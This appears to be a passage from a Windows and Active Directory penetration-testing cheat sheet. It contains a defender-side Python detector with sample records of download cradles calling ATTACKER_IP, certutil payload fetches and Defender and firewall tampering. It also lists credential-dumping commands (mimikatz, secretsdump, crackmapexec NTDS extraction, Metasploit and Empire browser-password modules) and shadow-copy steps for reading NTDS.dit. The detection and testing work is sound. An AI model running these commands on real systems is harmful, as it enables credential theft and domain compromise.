User must be in the "Event Log Readers" group
Follow this link

  1. Get-WinEvent -ListLog *
  2. # Listing logs on a remote host as a specific user
  3. $cred = Get-Credential
  4. Get-WinEvent -ListLog * -ComputerName AD1 -Credential $cred
  5. # Reading Security logs
  6. (Get-WinEvent -FilterHashtable @{LogName = 'Security'} | Select-Object @{name='NewProcessName';expression={ $_.Properties[5].Value }}, @{name='CommandLine';expression={ $_.Properties[8].Value }}).commandline
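The Get-WinEvent one-liner above pulls NewProcessName and CommandLine out of 4688 events; the next step on the defender's side is to match those command lines against the living-off-the-land patterns this page lists: msbuild.exe with a project file (AppLocker bypass), InstallUtil.exe /logfile= /LogToConsole=false and regasm.exe /U (GreatSCT), certutil -urlcache and PowerShell download cradles (Downloading files), and the Defender and firewall tampering commands under Bypass-Evasion. The Python below is an added example that runs such a match over constructed 4688 records; it is not code from the original page, and the tag names are my own.

```python
import re
from typing import Dict, List

# Signatures for the command lines this page lists. Tag names are my own; the
# patterns encode the commands shown on the page, not an exhaustive rule set.
LOLBIN_PATTERNS = [
    ("msbuild_project_execution",
     re.compile(r"\bmsbuild(\.exe)?\b.*\.(csproj|proj|xml)\b", re.I)),
    ("installutil_execution",
     re.compile(r"\binstallutil(\.exe)?\b.*/logfile=", re.I)),
    ("regasm_regsvcs_execution",
     re.compile(r"\b(regasm|regsvcs)(\.exe)?\b.*\s/u\b", re.I)),
    ("certutil_download",
     re.compile(r"\bcertutil(\.exe)?\b.*-urlcache", re.I)),
    ("certutil_decode",
     re.compile(r"\bcertutil(\.exe)?\b.*-decode\b", re.I)),
    ("powershell_download_cradle",
     re.compile(r"\b(downloadstring|downloadfile|invoke-webrequest|iwr)\b\s*\(?.*https?://", re.I)),
    ("defender_tamper",
     re.compile(r"set-mppreference.*-disablerealtimemonitoring"
                r"|\bmpcmdrun(\.exe)?\b.*-removedefinitions"
                r"|\bsc\s+(config|stop)\s+windefend\b", re.I)),
    ("firewall_disabled",
     re.compile(r"netsh\s+advfirewall\s+set\s+allprofiles\s+state\s+off", re.I)),
]


def classify_command_line(cmdline: str) -> List[str]:
    """Return the tags whose pattern matches the command line, in pattern order."""
    return [tag for tag, pattern in LOLBIN_PATTERNS if pattern.search(cmdline)]


# Constructed 4688 records holding the two properties the Get-WinEvent
# one-liner extracts (Properties[5] = NewProcessName, Properties[8] = CommandLine).
SAMPLE_4688 = [
    {"NewProcessName": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe",
     "CommandLine": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe .\out.csproj"},
    {"NewProcessName": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
     "CommandLine": r"InstallUtil.exe /logfile= /LogToConsole=false payload1.exe"},
    {"NewProcessName": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe",
     "CommandLine": r"regasm.exe /U payload.dll"},
    {"NewProcessName": r"C:\Windows\System32\certutil.exe",
     "CommandLine": 'certutil.exe -urlcache -split -f "http://127.0.0.1:80/shell.exe" shell.exe'},
    {"NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c \"IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')\""},
    {"NewProcessName": r"C:\Windows\System32\netsh.exe",
     "CommandLine": "netsh advfirewall set allprofiles state off"},
    {"NewProcessName": r"C:\Windows\System32\sc.exe",
     "CommandLine": "sc config WinDefend start= disabled"},
    {"NewProcessName": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\jdoe\notes.txt"},
]


def scan_process_events(events) -> List[Dict]:
    """Every 4688 record whose command line matches at least one pattern."""
    hits = []
    for ev in events:
        tags = classify_command_line(ev.get("CommandLine", ""))
        if tags:
            hits.append({"process": ev["NewProcessName"],
                         "command": ev["CommandLine"], "tags": tags})
    return hits


if __name__ == "__main__":
    for hit in scan_process_events(SAMPLE_4688):
        print(f"[{', '.join(hit['tags'])}] {hit['command']}")
```

CommandLine only appears in 4688 when "Include command line in process creation events" is enabled by policy; without it, Properties[8] is empty and every rule here goes blind. The msbuild and regasm patterns will also fire on real developer builds, which is where a per-host baseline (build servers, developer workstations) belongs rather than loosening the pattern.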

      Password Dump

  1. # Metasploit
  2. post/windows/gather/enum_chrome
  3. post/multi/gather/firefox_creds
  4. post/firefox/gather/cookies
  5. post/firefox/gather/passwords
  6. post/windows/gather/forensics/browser_history
  7. post/windows/gather/enum_putty_saved_sessions
  8. # Empire
  9. collection/ChromeDump
  10. collection/FoxDump
  11. collection/netripper
  12. credentials/sessiongopher
  13. # mimikatz
  14. privilege::debug
  15. sekurlsa::logonpasswords

      Shadow copy

There might be a case where you are privileged but still cannot read files that are locked while in use (NTDS.dit, SYSTEM, etc.); a shadow copy gets around the lock.

  1. diskshadow.exe
  2. set context persistent nowriters
  3. add volume C: alias morph3
  4. create
  5. expose %morph3% Z:
  6. # Deletion
  7. delete shadows volume %morph3%
  8. reset

      NTDS.dit dump

  1. secretsdump.py -system /tmp/SYSTEM -ntds /tmp/ntds.dit -outputfile /tmp/result local
  2. python crackmapexec.py 192.168.1.56 -u morph3 -p pass1234 -d evilcorp.com --ntds drsuapi
  3. # on DC, lsass.exe can dump hashes
  4. lsadump::lsa /inject

Summary of tools

      Ad Environment

icebreaker
bloodhound

      Post Exploitation

Empire
DeathStar
CrackMapExec – CME
Covenant
Rubeus
SharpDPAPI

      Bypass

Ebowla
Veil-Framework
PsBypassCLM

      Swiss Knife

impacket
